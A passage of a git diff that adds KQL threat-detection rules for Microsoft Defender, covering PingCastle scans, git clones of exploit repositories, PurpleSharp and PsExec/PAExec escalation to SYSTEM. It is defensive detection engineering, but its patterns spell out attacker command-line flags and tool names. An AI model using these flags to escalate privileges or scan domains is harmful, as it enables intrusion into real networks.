"606bd75ed9d2d6107ea7ee67063d1761a99f2fb5e932c8344d11395d24587dd6" or SHA256 startswith "b489d3cdd158f040322ae5c8d0139ad28eff743c738a10f2d0255c7e149bd92a" or SHA256 startswith "ca7ecf04a8ad63aff330492c15270d56760cb223a607cdb1431fb00e1b9985d1" or SHA256 startswith "9dc4fca72463078b70f6516559a179c78400b06534e63ee12fb38adbe2632559" or SHA256 startswith "c00d2aee59bac087d769e09b5b7f832176f7714fefdc6af2502e6031e3eb37c2" or SHA256 startswith "a8e96d564687064190eaf865774f773def05fdbf651aa5bbf66216c077b863ef" or SHA256 startswith "84ed328cee2a0505e87662faf6fc57915e3a831c97ee88ad691f5c63522e139d" or SHA256 startswith "c143de99c57965d3a44c1fce6a97c2773b050609c1ea7f45688a4ca2422a5524" or SHA256 startswith "01d1efd5e552c59baa70c0778902233c05fde7de6e5cc156c62607df0804d36b" or SHA256 startswith "9a8dfeb7e3174f3510691e2b32d0f9088e0ed67d9ed1b2afbe450d70dec2016b" or SHA256 startswith "63b92a114075d855f706979d50ed3460fe39f8a2f5498b7657f0d14865117629" or SHA256 startswith "2eb014130ff837b6481c26f0d0152f84de22ca7370b15a4f51921e0054a2a358" or SHA256 startswith "7d5bb4271bf8ca2b63a59e731f3ec831dbda53adb8e28665e956afb4941f32ca" or SHA256 startswith "e57098a75bf32e127c214b61bfba492d6b209e211f065fcc84ff10637a2143ea" or SHA256 startswith "dd14dbcdbcfcf4bc108a926b9667af4944a3b6faf808cf1bb9a3a2554722e172" or SHA256 startswith "dca2b1b824cb28bd15577eace45bde7ff8f8f44705b17085524659de31761de4" or SHA256 startswith "8b95f339a07d59a8c8d8580283dffb9e8dfabdeb9171e42c948ab68c71afe7f2" or SHA256 startswith "5428a840fab6ac4a0ecb2fc20dbc5f928432b00b9297dd1cb6e69336f44eba66" or SHA256 startswith "e2517ae0fccaa4aefe039026a4fc855964f0c2a5f84177140200b0e58ddbfd27" or SHA256 startswith "75d05880de2593480254181215dd9a0075373876f2f4a2a4a9a654b2e0729a41" or SHA256 startswith "56490e14ce3817c3a1ddc0d97b96e90d6351bcd29914e7c9282f6a998cca84b1" or SHA256 startswith "f25d0a5e77e4ed9e7c4204a33cfc8e46281b43adbee550b15701dd00f41bdbe0" or SHA256 startswith "845a5fdcbb08e7efa7e0eabfcd881c9eebc0eec0a3a2f8689194e6b91b6eeaf8" or SHA256 startswith "9a89e6652e563d26a3f328ba23d91f464c9549da734557c5a02559df24b2700d" or SHA256 startswith "5614f2bc9b2ed414aab2c5c7997bdcbe8236e67ced8f91a63d1b6cfbe6e08726" or SHA256 startswith "37bf92dcedb47a90d8d38ebda8d8dd168ef5803dcb01161f8cf6d68b70d49d90" or SHA256 startswith "ec8590f91f5cc21e931c57345425f0625a6e37dfba026b222260450de40459f5" or SHA256 startswith "3994eb72b1c227c593e14b8cad7001de11d1c247d4fbf84d0714bb8a17853140" or SHA256 startswith "d654f870436d63c9d8e4390d9d4d898abdf0456736c7654d71cdf81a299c3f87" or SHA256 startswith "63fbfabd4d8afb497dee47d112eb9d683671b75a8bf6407c4bd5027fd211b892" or SHA256 startswith "47028053f05188e6a366fff19bedbcad2bc4daba8ff9e4df724b77d0181b7054" or SHA256 startswith "7c1b1e8c880a30c43b3a52ee245f963a977e1f40284f4b83f4b9afe3821753dd")) or FolderPath endswith "\\PingCastle.exe" or ProcessVersionInfoOriginalFileName =~ "PingCastle.exe" or ProcessVersionInfoProductName =~ "Ping Castle" or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ") \ No newline at end of file diff --git a/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql b/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql new file mode 100644 index 00000000..2e92ce4e --- /dev/null +++ b/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql @@ -0,0 +1,11 @@ +// Title: PUA - PingCastle Execution From Potentially Suspicious Parent +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2024-01-11 +// Level: high +// Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location. + +// MITRE Tactic: Reconnaissance +// Tags: attack.reconnaissance, attack.t1595 + +DeviceProcessEvents +| where ((InitiatingProcessCommandLine contains ".bat" or InitiatingProcessCommandLine contains ".chm" or InitiatingProcessCommandLine contains ".cmd" or InitiatingProcessCommandLine contains ".hta" or InitiatingProcessCommandLine contains ".htm" or InitiatingProcessCommandLine contains ".html" or InitiatingProcessCommandLine contains ".js" or InitiatingProcessCommandLine contains ".lnk" or InitiatingProcessCommandLine contains ".ps1" or InitiatingProcessCommandLine contains ".vbe" or InitiatingProcessCommandLine contains ".vbs" or InitiatingProcessCommandLine contains ".wsf") or (InitiatingProcessCommandLine contains ":\\Perflogs\\" or InitiatingProcessCommandLine contains ":\\Temp\\" or InitiatingProcessCommandLine contains ":\\Users\\Public\\" or InitiatingProcessCommandLine contains ":\\Windows\\Temp\\" or InitiatingProcessCommandLine contains "\\AppData\\Local\\Temp" or InitiatingProcessCommandLine contains "\\AppData\\Roaming\\" or InitiatingProcessCommandLine contains "\\Temporary Internet") or ((InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favorites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favourites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Contacts\\"))) and (InitiatingProcessCommandLine contains ".bat" or InitiatingProcessCommandLine contains ".chm" or InitiatingProcessCommandLine contains ".cmd" or InitiatingProcessCommandLine contains ".hta" or InitiatingProcessCommandLine contains ".htm" or InitiatingProcessCommandLine contains ".html" or InitiatingProcessCommandLine contains ".js" or InitiatingProcessCommandLine contains ".lnk" or InitiatingProcessCommandLine contains ".ps1" or InitiatingProcessCommandLine contains ".vbe" or InitiatingProcessCommandLine contains ".vbs" or InitiatingProcessCommandLine contains ".wsf") and (FolderPath endswith "\\PingCastle.exe" or ProcessVersionInfoOriginalFileName =~ "PingCastle.exe" or ProcessVersionInfoProductName =~ "Ping Castle" or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")) \ No newline at end of file diff --git a/KQL/rules/Reconnaissance/suspicious_git_clone.kql b/KQL/rules/Reconnaissance/suspicious_git_clone.kql new file mode 100644 index 00000000..f8589ab0 --- /dev/null +++ b/KQL/rules/Reconnaissance/suspicious_git_clone.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Git Clone +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-03 +// Level: medium +// Description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious +// MITRE Tactic: Reconnaissance +// Tags: attack.reconnaissance, attack.t1593.003 + +DeviceProcessEvents +| where (ProcessCommandLine contains " clone " or ProcessCommandLine contains "git-remote-https ") and ((FolderPath endswith "\\git.exe" or FolderPath endswith "\\git-remote-https.exe") or ProcessVersionInfoOriginalFileName =~ "git.exe") and (ProcessCommandLine contains "exploit" or ProcessCommandLine contains "Vulns" or ProcessCommandLine contains "vulnerability" or ProcessCommandLine contains "RemoteCodeExecution" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "CVE-" or ProcessCommandLine contains "poc-" or ProcessCommandLine contains "ProofOfConcept" or ProcessCommandLine contains "proxyshell" or ProcessCommandLine contains "log4shell" or ProcessCommandLine contains "eternalblue" or ProcessCommandLine contains "eternal-blue" or ProcessCommandLine contains "MS17-") \ No newline at end of file diff --git a/KQL/rules/Reconnaissance/suspicious_git_clone_linux.kql b/KQL/rules/Reconnaissance/suspicious_git_clone_linux.kql new file mode 100644 index 00000000..1fcb54bb --- /dev/null +++ b/KQL/rules/Reconnaissance/suspicious_git_clone_linux.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Git Clone - Linux +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-03 +// Level: medium +// Description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious +// MITRE Tactic: Reconnaissance +// Tags: attack.reconnaissance, attack.t1593.003 + +DeviceProcessEvents +| where (ProcessCommandLine contains " clone " and FolderPath endswith "/git") and (ProcessCommandLine contains "exploit" or ProcessCommandLine contains "Vulns" or ProcessCommandLine contains "vulnerability" or ProcessCommandLine contains "RCE" or ProcessCommandLine contains "RemoteCodeExecution" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "CVE-" or ProcessCommandLine contains "poc-" or ProcessCommandLine contains "ProofOfConcept" or ProcessCommandLine contains "proxyshell" or ProcessCommandLine contains "log4shell" or ProcessCommandLine contains "eternalblue" or ProcessCommandLine contains "eternal-blue" or ProcessCommandLine contains "MS17-") \ No newline at end of file diff --git a/KQL/rules/Resource Development/creation_of_a_diagcab.kql b/KQL/rules/Resource Development/creation_of_a_diagcab.kql new file mode 100644 index 00000000..9806f518 --- /dev/null +++ b/KQL/rules/Resource Development/creation_of_a_diagcab.kql @@ -0,0 +1,12 @@ +// Title: Creation of a Diagcab +// Author: frack113 +// Date: 2022-06-08 +// Level: medium +// Description: Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location) +// MITRE Tactic: Resource Development +// Tags: attack.resource-development +// False Positives: +// - Legitimate microsoft diagcab + +DeviceFileEvents +| where FolderPath endswith ".diagcab" \ No newline at end of file diff --git a/KQL/rules/Resource Development/hacktool_purplesharp_execution.kql b/KQL/rules/Resource Development/hacktool_purplesharp_execution.kql new file mode 100644 index 00000000..2f2efedc --- /dev/null +++ b/KQL/rules/Resource Development/hacktool_purplesharp_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - PurpleSharp Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-06-18 +// Level: critical +// Description: Detects the execution of the PurpleSharp adversary simulation tool +// MITRE Tactic: Resource Development +// Tags: attack.t1587, attack.resource-development +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "xyz123456.exe" or ProcessCommandLine contains "PurpleSharp") or (FolderPath contains "\\purplesharp" or ProcessVersionInfoOriginalFileName =~ "PurpleSharp.exe") \ No newline at end of file diff --git a/KQL/rules/Resource Development/hybridconnectionmanager_service_installation_registry.kql b/KQL/rules/Resource Development/hybridconnectionmanager_service_installation_registry.kql new file mode 100644 index 00000000..d51376c7 --- /dev/null +++ b/KQL/rules/Resource Development/hybridconnectionmanager_service_installation_registry.kql @@ -0,0 +1,10 @@ +// Title: HybridConnectionManager Service Installation - Registry +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2021-04-12 +// Level: high +// Description: Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function. +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1608 + +DeviceRegistryEvents +| where RegistryKey contains "\\Services\\HybridConnectionManager" or (RegistryValueData contains "Microsoft.HybridConnectionManager.Listener.exe" and ActionType =~ "RegistryValueSet") \ No newline at end of file diff --git a/KQL/rules/Resource Development/potential_execution_of_sysinternals_tools.kql b/KQL/rules/Resource Development/potential_execution_of_sysinternals_tools.kql new file mode 100644 index 00000000..b7515c03 --- /dev/null +++ b/KQL/rules/Resource Development/potential_execution_of_sysinternals_tools.kql @@ -0,0 +1,13 @@ +// Title: Potential Execution of Sysinternals Tools +// Author: Markus Neis +// Date: 2017-08-28 +// Level: low +// Description: Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 +// False Positives: +// - Legitimate use of SysInternals tools +// - Programs that use the same command line flag + +DeviceProcessEvents +| where ProcessCommandLine contains " -accepteula" or ProcessCommandLine contains " /accepteula" or ProcessCommandLine contains " –accepteula" or ProcessCommandLine contains " —accepteula" or ProcessCommandLine contains " ―accepteula" \ No newline at end of file diff --git a/KQL/rules/Resource Development/potential_privilege_escalation_to_local_system.kql b/KQL/rules/Resource Development/potential_privilege_escalation_to_local_system.kql new file mode 100644 index 00000000..9c262e44 --- /dev/null +++ b/KQL/rules/Resource Development/potential_privilege_escalation_to_local_system.kql @@ -0,0 +1,13 @@ +// Title: Potential Privilege Escalation To LOCAL SYSTEM +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-05-22 +// Level: high +// Description: Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001 +// False Positives: +// - Weird admins that rename their tools +// - Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing + +DeviceProcessEvents +| where (ProcessCommandLine contains " -s cmd" or ProcessCommandLine contains " /s cmd" or ProcessCommandLine contains " –s cmd" or ProcessCommandLine contains " —s cmd" or ProcessCommandLine contains " ―s cmd" or ProcessCommandLine contains " -s -i cmd" or ProcessCommandLine contains " -s /i cmd" or ProcessCommandLine contains " -s –i cmd" or ProcessCommandLine contains " -s —i cmd" or ProcessCommandLine contains " -s ―i cmd" or ProcessCommandLine contains " /s -i cmd" or ProcessCommandLine contains " /s /i cmd" or ProcessCommandLine contains " /s –i cmd" or ProcessCommandLine contains " /s —i cmd" or ProcessCommandLine contains " /s ―i cmd" or ProcessCommandLine contains " –s -i cmd" or ProcessCommandLine contains " –s /i cmd" or ProcessCommandLine contains " –s –i cmd" or ProcessCommandLine contains " –s —i cmd" or ProcessCommandLine contains " –s ―i cmd" or ProcessCommandLine contains " —s -i cmd" or ProcessCommandLine contains " —s /i cmd" or ProcessCommandLine contains " —s –i cmd" or ProcessCommandLine contains " —s —i cmd" or ProcessCommandLine contains " —s ―i cmd" or ProcessCommandLine contains " ―s -i cmd" or ProcessCommandLine contains " ―s /i cmd" or ProcessCommandLine contains " ―s –i cmd" or ProcessCommandLine contains " ―s —i cmd" or ProcessCommandLine contains " ―s ―i cmd" or ProcessCommandLine contains " -i -s cmd" or ProcessCommandLine contains " -i /s cmd" or ProcessCommandLine contains " -i –s cmd" or ProcessCommandLine contains " -i —s cmd" or ProcessCommandLine contains " -i ―s cmd" or ProcessCommandLine contains " /i -s cmd" or ProcessCommandLine contains " /i /s cmd" or ProcessCommandLine contains " /i –s cmd" or ProcessCommandLine contains " /i —s cmd" or ProcessCommandLine contains " /i ―s cmd" or ProcessCommandLine contains " –i -s cmd" or ProcessCommandLine contains " –i /s cmd" or ProcessCommandLine contains " –i –s cmd" or ProcessCommandLine contains " –i —s cmd" or ProcessCommandLine contains " –i ―s cmd" or ProcessCommandLine contains " —i -s cmd" or ProcessCommandLine contains " —i /s cmd" or ProcessCommandLine contains " —i –s cmd" or ProcessCommandLine contains " —i —s cmd" or ProcessCommandLine contains " —i ―s cmd" or ProcessCommandLine contains " ―i -s cmd" or ProcessCommandLine contains " ―i /s cmd" or ProcessCommandLine contains " ―i –s cmd" or ProcessCommandLine contains " ―i —s cmd" or ProcessCommandLine contains " ―i ―s cmd" or ProcessCommandLine contains " -s pwsh" or ProcessCommandLine contains " /s pwsh" or ProcessCommandLine contains " –s pwsh" or ProcessCommandLine contains " —s pwsh" or ProcessCommandLine contains " ―s pwsh" or ProcessCommandLine contains " -s -i pwsh" or ProcessCommandLine contains " -s /i pwsh" or ProcessCommandLine contains " -s –i pwsh" or ProcessCommandLine contains " -s —i pwsh" or ProcessCommandLine contains " -s ―i pwsh" or ProcessCommandLine contains " /s -i pwsh" or ProcessCommandLine contains " /s /i pwsh" or ProcessCommandLine contains " /s –i pwsh" or ProcessCommandLine contains " /s —i pwsh" or ProcessCommandLine contains " /s ―i pwsh" or ProcessCommandLine contains " –s -i pwsh" or ProcessCommandLine contains " –s /i pwsh" or ProcessCommandLine contains " –s –i pwsh" or ProcessCommandLine contains " –s —i pwsh" or ProcessCommandLine contains " –s ―i pwsh" or ProcessCommandLine contains " —s -i pwsh" or ProcessCommandLine contains " —s /i pwsh" or ProcessCommandLine contains " —s –i pwsh" or ProcessCommandLine contains " —s —i pwsh" or ProcessCommandLine contains " —s ―i pwsh" or ProcessCommandLine contains " ―s -i pwsh" or ProcessCommandLine contains " ―s /i pwsh" or ProcessCommandLine contains " ―s –i pwsh" or ProcessCommandLine contains " ―s —i pwsh" or ProcessCommandLine contains " ―s ―i pwsh" or ProcessCommandLine contains " -i -s pwsh" or ProcessCommandLine contains " -i /s pwsh" or ProcessCommandLine contains " -i –s pwsh" or ProcessCommandLine contains " -i —s pwsh" or ProcessCommandLine contains " -i ―s pwsh" or ProcessCommandLine contains " /i -s pwsh" or ProcessCommandLine contains " /i /s pwsh" or ProcessCommandLine contains " /i –s pwsh" or ProcessCommandLine contains " /i —s pwsh" or ProcessCommandLine contains " /i ―s pwsh" or ProcessCommandLine contains " –i -s pwsh" or ProcessCommandLine contains " –i /s pwsh" or ProcessCommandLine contains " –i –s pwsh" or ProcessCommandLine contains " –i —s pwsh" or ProcessCommandLine contains " –i ―s pwsh" or ProcessCommandLine contains " —i -s pwsh" or ProcessCommandLine contains " —i /s pwsh" or ProcessCommandLine contains " —i –s pwsh" or ProcessCommandLine contains " —i —s pwsh" or ProcessCommandLine contains " —i ―s pwsh" or ProcessCommandLine contains " ―i -s pwsh" or ProcessCommandLine contains " ―i /s pwsh" or ProcessCommandLine contains " ―i –s pwsh" or ProcessCommandLine contains " ―i —s pwsh" or ProcessCommandLine contains " ―i ―s pwsh" or ProcessCommandLine contains " -s powershell" or ProcessCommandLine contains " /s powershell" or ProcessCommandLine contains " –s powershell" or ProcessCommandLine contains " —s powershell" or ProcessCommandLine contains " ―s powershell" or ProcessCommandLine contains " -s -i powershell" or ProcessCommandLine contains " -s /i powershell" or ProcessCommandLine contains " -s –i powershell" or ProcessCommandLine contains " -s —i powershell" or ProcessCommandLine contains " -s ―i powershell" or ProcessCommandLine contains " /s -i powershell" or ProcessCommandLine contains " /s /i powershell" or ProcessCommandLine contains " /s –i powershell" or ProcessCommandLine contains " /s —i powershell" or ProcessCommandLine contains " /s ―i powershell" or ProcessCommandLine contains " –s -i powershell" or ProcessCommandLine contains " –s /i powershell" or ProcessCommandLine contains " –s –i powershell" or ProcessCommandLine contains " –s —i powershell" or ProcessCommandLine contains " –s ―i powershell" or ProcessCommandLine contains " —s -i powershell" or ProcessCommandLine contains " —s /i powershell" or ProcessCommandLine contains " —s –i powershell" or ProcessCommandLine contains " —s —i powershell" or ProcessCommandLine contains " —s ―i powershell" or ProcessCommandLine contains " ―s -i powershell" or ProcessCommandLine contains " ―s /i powershell" or ProcessCommandLine contains " ―s –i powershell" or ProcessCommandLine contains " ―s —i powershell" or ProcessCommandLine contains " ―s ―i powershell" or ProcessCommandLine contains " -i -s powershell" or ProcessCommandLine contains " -i /s powershell" or ProcessCommandLine contains " -i –s powershell" or ProcessCommandLine contains " -i —s powershell" or ProcessCommandLine contains " -i ―s powershell" or ProcessCommandLine contains " /i -s powershell" or ProcessCommandLine contains " /i /s powershell" or ProcessCommandLine contains " /i –s powershell" or ProcessCommandLine contains " /i —s powershell" or ProcessCommandLine contains " /i ―s powershell" or ProcessCommandLine contains " –i -s powershell" or ProcessCommandLine contains " –i /s powershell" or ProcessCommandLine contains " –i –s powershell" or ProcessCommandLine contains " –i —s powershell" or ProcessCommandLine contains " –i ―s powershell" or ProcessCommandLine contains " —i -s powershell" or ProcessCommandLine contains " —i /s powershell" or ProcessCommandLine contains " —i –s powershell" or ProcessCommandLine contains " —i —s powershell" or ProcessCommandLine contains " —i ―s powershell" or ProcessCommandLine contains " ―i -s powershell" or ProcessCommandLine contains " ―i /s powershell" or ProcessCommandLine contains " ―i –s powershell" or ProcessCommandLine contains " ―i —s powershell" or ProcessCommandLine contains " ―i ―s powershell") and (not((ProcessCommandLine contains "paexec" or ProcessCommandLine contains "PsExec" or ProcessCommandLine contains "accepteula"))) \ No newline at end of file diff --git a/KQL/rules/Resource Development/potential_psexec_remote_execution.kql b/KQL/rules/Resource Development/potential_psexec_remote_execution.kql new file mode 100644 index 00000000..5e52c28e --- /dev/null +++ b/KQL/rules/Resource Development/potential_psexec_remote_execution.kql @@ -0,0 +1,10 @@ +// Title: Potential PsExec Remote Execution +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-28 +// Level: high +// Description: Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "accepteula" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " \\\\") and (not((ProcessCommandLine contains "\\\\localhost" or ProcessCommandLine contains "\\\\127."))) \ No newline at end of file diff --git a/KQL/rules/Resource Development/psexec_paexec_escalation_to_local_system.kql b/KQL/rules/Resource Development/psexec_paexec_escalation_to_local_system.kql new file mode 100644 index 00000000..ca3b3936 --- /dev/null +++ b/KQL/rules/Resource Development/psexec_paexec_escalation_to_local_system.kql @@ -0,0 +1,13 @@ +// Title: PsExec/PAExec Escalation to LOCAL SYSTEM +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-11-23 +// Level: high +// Description: Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001 +// False Positives: +// - Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare) +// - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension + +DeviceProcessEvents +| where (ProcessCommandLine contains "psexec" or ProcessCommandLine contains "paexec" or ProcessCommandLine contains "accepteula") and (ProcessCommandLine contains " -s cmd" or ProcessCommandLine contains " /s cmd" or ProcessCommandLine contains " –s cmd" or ProcessCommandLine contains " —s cmd" or ProcessCommandLine contains " ―s cmd" or ProcessCommandLine contains " -s -i cmd" or ProcessCommandLine contains " -s /i cmd" or ProcessCommandLine contains " -s –i cmd" or ProcessCommandLine contains " -s —i cmd" or ProcessCommandLine contains " -s ―i cmd" or ProcessCommandLine contains " /s -i cmd" or ProcessCommandLine contains " /s /i cmd" or ProcessCommandLine contains " /s –i cmd" or ProcessCommandLine contains " /s —i cmd" or ProcessCommandLine contains " /s ―i cmd" or ProcessCommandLine contains " –s -i cmd" or ProcessCommandLine contains " –s /i cmd" or ProcessCommandLine contains " –s –i cmd" or ProcessCommandLine contains " –s —i cmd" or ProcessCommandLine contains " –s ―i cmd" or ProcessCommandLine contains " —s -i cmd" or ProcessCommandLine contains " —s /i cmd" or ProcessCommandLine contains " —s –i cmd" or ProcessCommandLine contains " —s —i cmd" or ProcessCommandLine contains " —s ―i cmd" or ProcessCommandLine contains " ―s -i cmd" or ProcessCommandLine contains " ―s /i cmd" or ProcessCommandLine contains " ―s –i cmd" or ProcessCommandLine contains " ―s —i cmd" or ProcessCommandLine contains " ―s ―i cmd" or ProcessCommandLine contains " -i -s cmd" or ProcessCommandLine contains " -i /s cmd" or ProcessCommandLine contains " -i –s cmd" or ProcessCommandLine contains " -i —s cmd" or ProcessCommandLine contains " -i ―s cmd" or ProcessCommandLine contains " /i -s cmd" or ProcessCommandLine contains " /i /s cmd" or ProcessCommandLine contains " /i –s cmd" or ProcessCommandLine contains " /i —s cmd" or ProcessCommandLine contains " /i ―s cmd" or ProcessCommandLine contains " –i -s cmd" or ProcessCommandLine contains " –i /s cmd" or ProcessCommandLine contains " –i –s cmd" or ProcessCommandLine contains " –i —s cmd" or ProcessCommandLine contains " –i ―s cmd" or ProcessCommandLine contains " —i -s cmd" or ProcessCommandLine contains " —i /s cmd" or ProcessCommandLine contains " —i –s cmd" or ProcessCommandLine contains " —i —s cmd" or ProcessCommandLine contains " —i ―s cmd" or ProcessCommandLine contains " ―i -s cmd" or ProcessCommandLine contains " ―i /s cmd" or ProcessCommandLine contains " ―i –s cmd" or ProcessCommandLine contains " ―i —s cmd" or ProcessCommandLine contains " ―i ―s cmd" or ProcessCommandLine contains " -s pwsh" or ProcessCommandLine contains " /s pwsh" or ProcessCommandLine contains " –s pwsh" or ProcessCommandLine contains " —s pwsh" or ProcessCommandLine contains " ―s pwsh" or ProcessCommandLine contains " -s -i pwsh" or ProcessCommandLine contains " -s /i pwsh" or ProcessCommandLine contains " -s –i pwsh" or ProcessCommandLine contains " -s —i pwsh" or ProcessCommandLine contains " -s ―i pwsh" or ProcessCommandLine contains " /s -i pwsh" or ProcessCommandLine contains " /s /i pwsh" or ProcessCommandLine contains " /s –i pwsh" or ProcessCommandLine contains " /s —i pwsh" or ProcessCommandLine contains " /s ―i pwsh" or ProcessCommandLine contains " –s -i pwsh" or ProcessCommandLine contains " –s /i pwsh" or ProcessCommandLine contains " –s –i pwsh" or ProcessCommandLine contains " –s —i pwsh" or ProcessCommandLine contains " –s ―i pwsh" or ProcessCommandLine contains " —s -i pwsh" or ProcessCommandLine contains " —s /i pwsh" or ProcessCommandLine contains " —s –i pwsh" or ProcessCommandLine contains " —s —i pwsh" or ProcessCommandLine contains " —s ―i pwsh" or ProcessCommandLine contains " ―s -i pwsh" or ProcessCommandLine contains " ―s /i pwsh" or ProcessCommandLine contains " ―s –i pwsh" or ProcessCommandLine contains " ―s —i pwsh" or ProcessCommandLine contains " ―s ―i pwsh" or ProcessCommandLine contains " -i -s pwsh" or ProcessCommandLine contains " -i /s pwsh" or ProcessCommandLine contains " -i –s pwsh" or ProcessCommandLine contains " -i —s pwsh" or ProcessCommandLine contains " -i ―s pwsh" or ProcessCommandLine contains " /i -s pwsh" or ProcessCommandLine contains " /i /s pwsh" or ProcessCommandLine contains " /i –s pwsh" or ProcessCommandLine contains " /i —s pwsh" or ProcessCommandLine contains " /i ―s pwsh" or ProcessCommandLine contains " –i -s pwsh" or ProcessCommandLine contains " –i /s pwsh" or ProcessCommandLine contains " –i –s pwsh" or ProcessCommandLine contains " –i —s pwsh" or ProcessCommandLine contains " –i ―s pwsh" or ProcessCommandLine contains " —i -s pwsh" or ProcessCommandLine contains " —i /s pwsh" or ProcessCommandLine contains " —i –s pwsh" or ProcessCommandLine contains " —i —s pwsh" or ProcessCommandLine contains " —i ―s pwsh" or ProcessCommandLine contains " ―i -s pwsh" or ProcessCommandLine contains " ―i /s pwsh" or ProcessCommandLine contains " ―i –s pwsh" or ProcessCommandLine contains " ―i —s pwsh" or ProcessCommandLine contains " ―i ―s pwsh" or ProcessCommandLine contains " -s powershell" or ProcessCommandLine contains " /s powershell" or ProcessCommandLine contains " –s powershell" or ProcessCommandLine contains " —s powershell" or ProcessCommandLine contains " ―s powershell" or ProcessCommandLine contains " -s -i powershell" or ProcessCommandLine contains " -s /i powershell" or ProcessCommandLine contains " -s –i powershell" or ProcessCommandLine contains " -s —i powershell" or ProcessCommandLine contains " -s ―i powershell" or ProcessCommandLine contains " /s -i powershell" or ProcessCommandLine contains " /s /i powershell" or ProcessCommandLine contains " /s –i powershell" or ProcessCommandLine contains " /s —i powershell" or ProcessCommandLine contains " /s ―i powershell" or ProcessCommandLine contains " –s -i powershell" or ProcessCommandLine contains " –s /i powershell" or ProcessCommandLine contains " –s –i powershell" or ProcessCommandLine contains " –s —i powershell" or ProcessCommandLine contains " –s ―i powershell" or ProcessCommandLine contains " —s -i powershell" or ProcessCommandLine contains " —s /i powershell" or ProcessCommandLine contains " —s –i powershell" or ProcessCommandLine contains " —s —i powershell" or ProcessCommandLine contains " —s ―i powershell" or ProcessCommandLine contains " ―s -i powershell" or ProcessCommandLine contains " ―s /i powershell" or ProcessCommandLine contains " ―s –i powershell" or ProcessCommandLine contains " ―s —i powershell" or ProcessCommandLine contains " ―s ―i powershell" or ProcessCommandLine contains " -i -s powershell" or ProcessCommandLine contains " -i /s powershell" or ProcessCommandLine contains " -i –s powershell" or ProcessCommandLine contains " -i —s powershell" or ProcessCommandLine contains " -i ―s powershell" or 